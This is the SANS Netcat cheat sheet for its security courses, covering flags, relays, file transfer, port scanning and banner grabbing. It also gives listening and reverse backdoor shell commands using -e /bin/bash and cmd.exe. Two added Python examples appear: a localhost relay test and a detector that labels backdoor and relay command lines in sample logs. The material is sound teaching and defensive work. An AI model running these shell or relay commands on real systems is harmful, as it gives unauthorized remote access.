Sans PDF

Netcat can be used to create relays that forward network connections between ports on the same or different systems. The document provides examples of using Netcat on Windows to create listener-to-client, listener-to-listener, and client-to-client relays by launching Netcat instances that accept connections on one port and connect to another port. Similar techniques for creating relays on Linux using named pipes are also described. The document also outlines other common Netcat commands for tasks like file transfer, banner grabbing, port scanning, and establishing backdoor shells.
Netcat Cheat Sheet
By Ed Skoudis
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose

This cheat sheet provides various tips for using Netcat on both Linux and Unix, specifically tailored to the SANS 504, 517, and 560 courses. All syntax is designed for the original Netcat versions, released by Hobbit and Weld Pond. The syntax here can be adapted for other Netcats, including ncat, gnu Netcat, and others.

Fundamentals

Fundamental Netcat Client:
$ nc [TargetIPaddr] [port]
Connect to an arbitrary port [port] at IP Address [TargetIPaddr]

Fundamental Netcat Listener:
$ nc -l -p [LocalPort]
Create a Netcat listener on arbitrary local port [LocalPort]

Both the client and listener take input from STDIN and send data received from the network to STDOUT

Netcat Command Flags

$ nc [options] [TargetIPaddr] [port(s)]
The [TargetIPaddr] is simply the other side's IP address or domain name. It is required in client mode of course (because we have to tell the client where to connect), and is optional in listen mode.

-l: Listen mode (default is client mode)
-L: Listen harder (supported only on Windows version of Netcat). This option makes Netcat a persistent listener which starts listening again after a client disconnects
-u: UDP mode (default is TCP)
-p: Local port (In listen mode, this is the port listened on. In client mode, this is the source port for all packets sent)
-e: Program to execute after connection occurs, connecting STDIN and STDOUT to the program
-n: Don't perform DNS lookups on names of machines on the other side
-z: Zero-I/O mode (Don't send any data, just emit a packet without payload)
-wN: Timeout for connects, waits for N seconds after closure of STDIN. A Netcat client or listener with this option will wait for N seconds to make a connection. If the connection doesn't happen in that time, Netcat stops running.
-v: Be verbose, printing out messages on Standard Error, such as when a connection occurs
-vv: Be very verbose, printing even more details on Standard Error

Netcat Relays on Windows

To start, enter a temporary directory where we will create .bat files:
C:\> cd c:\temp

Listener-to-Client Relay:
C:\> echo nc [TargetIPaddr] [port] > relay.bat
C:\> nc -l -p [LocalPort] -e relay.bat
Create a relay that sends packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [port]

Listener-to-Listener Relay:
C:\> echo nc -l -p [LocalPort_2] > relay.bat
C:\> nc -l -p [LocalPort_1] -e relay.bat
Create a relay that will send packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Client-to-Client Relay:
C:\> echo nc [NextHopIPaddr] [port2] > relay.bat
C:\> nc [PreviousHopIPaddr] [port] -e relay.bat
Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2]
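The relays above work because -e wires the second Netcat's STDIN and STDOUT to the first one's socket, so traffic flows in both directions; a plain shell pipe would only carry one direction, which is why the sheet's Linux relays need the backpipe FIFO for the return path. The following added example (written for this page, not code from the cheat sheet or from Netcat) shows the same Listener-to-Client relay as explicit Python socket code, one thread per direction, driven end to end against a local echo server that stands in for [TargetIPaddr]:[port]. All addresses and ports are constructed for a localhost test.

```python
"""Added example, not from the SANS cheat sheet: a Listener-to-Client relay
in plain Python sockets so both data directions are visible."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    far end sees EOF too (the job `tee backpipe` does in the sheet's Linux
    relay for the return direction)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _serve_one(listener, handler):
    """Accept a single connection, hand it to handler, then close."""
    conn, _ = listener.accept()
    listener.close()
    with conn:
        handler(conn)


def start_listener(handler):
    """One-shot listener on 127.0.0.1 with an OS-chosen port (the listen-mode
    half of `nc -l -p [LocalPort]`).  Returns (port, thread)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # constructed: loopback, any free port
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=_serve_one, args=(listener, handler), daemon=True)
    t.start()
    return port, t


def start_echo_server():
    """Stand-in for the service at [TargetIPaddr]:[port]: echoes its input."""
    return start_listener(lambda conn: _pump(conn, conn))


def start_listener_to_client_relay(target_host, target_port):
    """Listener-to-Client relay: whoever connects to the returned local port
    is spliced, both ways, to target_host:target_port."""
    def splice(conn):
        with socket.create_connection((target_host, target_port)) as upstream:
            forward = threading.Thread(target=_pump, args=(conn, upstream))
            back = threading.Thread(target=_pump, args=(upstream, conn))
            forward.start()
            back.start()
            forward.join()
            back.join()
    return start_listener(splice)


def send_through_relay(payload):
    """Drive the chain client -> relay -> echo server and return what the
    client reads back; with an echo server that equals the payload."""
    echo_port, echo_thread = start_echo_server()
    relay_port, relay_thread = start_listener_to_client_relay("127.0.0.1", echo_port)
    with socket.create_connection(("127.0.0.1", relay_port)) as client:
        client.sendall(payload)
        client.shutdown(socket.SHUT_WR)   # like closing STDIN on the nc client
        received = b""
        while True:
            chunk = client.recv(4096)
            if not chunk:
                break
            received += chunk
    relay_thread.join(timeout=5)
    echo_thread.join(timeout=5)
    return received


if __name__ == "__main__":
    print(send_through_relay(b"hello through the relay\n"))
```

Note that every relay hop completes its own TCP handshake, so on the relay host the connection log shows an inbound connection on the local port paired with an outbound one to the target, which is the pattern to look for when reviewing a host suspected of relaying.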
File Transfer

Push a file from client to listener:
$ nc -l -p [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]

Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]

TCP Port Scanner

Port scan an IP Address:
$ nc -v -n -z -w1 [TargetIPaddr] [start_port]-[end_port]
Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)

The randomize ports (-r) switch can be used to choose port numbers randomly in the range

TCP Banner Grabber

Grab the banner of any TCP service running on an IP Address from Linux:
$ echo "" | nc -v -n -w1 [TargetIPaddr] [start_port]-[end_port]
Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response

Add -r to randomize destination ports within the range

Add -p [port] to specify a source port for the scan

Backdoor Shells

Listening backdoor shell on Linux:
$ nc -l -p [LocalPort] -e /bin/bash
Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe
Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client

Reverse backdoor shell on Linux:
$ nc [YourIPaddr] [port] -e /bin/bash
Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [port] -e cmd.exe
Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener

Netcat Relays on Linux

To start, create a FIFO (named pipe) called backpipe:
$ cd /tmp
$ mknod backpipe p

Listener-to-Client Relay:
$ nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [port] | tee backpipe
Create a relay that sends packets from the local port [LocalPort] to a Netcat client connected to [TargetIPaddr] on port [port]

Listener-to-Listener Relay:
$ nc -l -p [LocalPort_1] 0<backpipe | nc -l -p [LocalPort_2] | tee backpipe
Create a relay that sends packets from any connection on [LocalPort_1] to any connection on [LocalPort_2]

Client-to-Client Relay:
$ nc [PreviousHopIPaddr] [port] 0<backpipe | nc [NextHopIPaddr] [port2] | tee backpipe
Create a relay that sends packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat client connected to [NextHopIPaddr] on port [port2]
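The Backdoor Shells and Netcat Relays sections describe exactly the command-line shapes a defender wants to spot in process-creation telemetry: -e (a program wired to the socket), -L (a persistent Windows listener) and the `0<backpipe ... | tee backpipe` relay idiom. The added example below (written for this page, not part of the cheat sheet) scans a handful of constructed process-execution log lines, picks out every pipeline stage whose program is a Netcat binary, expands bundled flags such as -lvp, and labels each command line after the sheet's sections. The "ts host= user= cmd=" line layout is a placeholder, not any real product's format.

```python
"""Added example, not from the SANS cheat sheet: label Netcat command lines
from process-creation logs by the usage patterns the sheet lists."""
import os
import re
import shlex

NETCAT_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}

# Constructed sample lines; hosts, users and addresses are made up.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host=web01 user=www-data cmd=nc -l -p 4444 -e /bin/bash
2024-05-01T10:00:02Z host=ws07 user=alice cmd=C:\\tools\\nc.exe 203.0.113.5 443 -e cmd.exe
2024-05-01T10:00:03Z host=jump01 user=root cmd=nc -l -p 8080 0<backpipe | nc 10.0.0.9 80 | tee backpipe
2024-05-01T10:00:04Z host=ws07 user=alice cmd=nc.exe -L -p 8000 -e cmd.exe
2024-05-01T10:00:05Z host=mon01 user=nagios cmd=nc -v -n -z -w1 10.0.0.9 22
2024-05-01T10:00:06Z host=web01 user=www-data cmd=/usr/bin/python3 app.py
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.+)$")


def _netcat_stages(cmd):
    """Split a command line on '|' and return the token lists of the stages
    whose program is a Netcat binary (matched on basename, any case).
    posix=False keeps Windows paths like C:\\tools\\nc.exe intact."""
    stages = []
    for stage in cmd.split("|"):
        tokens = shlex.split(stage.strip(), posix=False)
        if not tokens:
            continue
        exe = os.path.basename(tokens[0].replace("\\", "/")).lower()
        if exe in NETCAT_NAMES:
            stages.append(tokens)
    return stages


def _flags(tokens):
    """Collect single-dash option letters, expanding bundles like -lvp and
    dropping the numeric part of -w1.  Case is kept: -L is the Windows
    'listen harder' flag, -l the ordinary listener."""
    letters = set()
    for tok in tokens[1:]:
        if re.fullmatch(r"-[A-Za-z]+\d*", tok):
            letters.update(ch for ch in tok[1:] if ch.isalpha())
    return letters


def classify(cmd):
    """Label one command line after the sheet's sections; None if no stage
    of the pipeline is Netcat."""
    stages = _netcat_stages(cmd)
    if not stages:
        return None
    flags = set().union(*(_flags(s) for s in stages))
    listening = bool(flags & {"l", "L"})
    if "e" in flags:                                   # program on the socket
        label = "listening backdoor shell" if listening else "reverse backdoor shell"
        severity = "high"
    elif len(stages) >= 2 and "backpipe" in cmd:       # nc ... 0<backpipe | nc ... | tee backpipe
        label = "named-pipe relay"
        severity = "high"
    elif "z" in flags:                                 # -z: connect, send nothing
        label = "zero-I/O port check"
        severity = "low"
    elif listening:                                    # e.g. file-transfer receive side
        label = "plain listener"
        severity = "medium"
    else:
        label = "plain client"
        severity = "low"
    return {"label": label, "severity": severity, "persistent": "L" in flags}


def scan_log(text):
    """Run classify() over every parsable line and return the Netcat findings."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group("cmd"))
        if verdict:
            findings.append({"ts": m.group("ts"), "host": m.group("host"),
                             "user": m.group("user"), "cmd": m.group("cmd"), **verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['host']:7} {f['label']}: {f['cmd']}")
```

Matching on the binary's basename alone is deliberately loose: a renamed copy of nc would slip past it, so in practice this check is paired with the connection-level view (a listener with -e shows up as a long-lived inbound connection to a shell's child process; a relay shows an inbound and an outbound connection on the same host at the same time). The -z branch exists so that a monitoring account's port checks are labelled and kept separate rather than silently dropped.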